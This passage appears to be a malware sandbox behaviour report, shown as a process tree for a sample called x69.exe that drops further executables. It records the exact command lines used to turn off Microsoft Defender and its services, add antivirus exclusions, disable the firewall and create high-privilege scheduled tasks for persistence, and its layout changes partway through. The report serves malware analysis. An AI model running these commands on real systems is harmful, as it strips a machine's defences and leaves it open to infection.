+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:3352
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2868
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2968
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3332
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\x69.exe"C:\Users\Admin\AppData\Local\Temp\x69.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3708
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2412
-
-
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4120
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9942.tmp\9953.tmp\9954.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:4440
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5032 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:1404
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4160
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:3400
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:3772
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:4904
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:4056
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1896
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3756
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2844
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4348
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4540
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:2424
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:3016
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:404
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:4308
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4160
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4460
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:1680
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:4320
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:1432
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:1852
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:4720
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:4556
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:1676
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:848
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:3672
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:4692
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:4240
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1580
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:3224
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1712
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:3596
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4840
-
-
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2864
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2092
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1888
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exeC:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2456
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9933.tmp\9934.tmp\9935.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -MAPSReporting 0"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 3400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 4148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 4088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 4828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 3984
  C:\Windows\system32\reg.exe (depth 6)
  cmdline: "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  PID: 1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
(the typographic quotes U+201C/U+201D are part of the sample's own command line)
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 3756
  C:\Windows\system32\reg.exe (depth 6)
  cmdline: "C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  PID: 1840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
cmdline: powershell.exe -command "netsh advfirewall set allprofiles state off"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID: 1560
  C:\Windows\system32\netsh.exe (depth 6)
  cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID: 3752

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- Modifies Windows Defender Real-time Protection settings
PID: 3908

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- Modifies Windows Defender DisableAntiSpyware settings
PID: 216

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
PID: 2804

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
PID: 3672

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- Modifies Windows Defender Real-time Protection settings
PID: 3400

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- Modifies Windows Defender Real-time Protection settings
PID: 3772

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- Modifies Windows Defender Real-time Protection settings
PID: 408

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
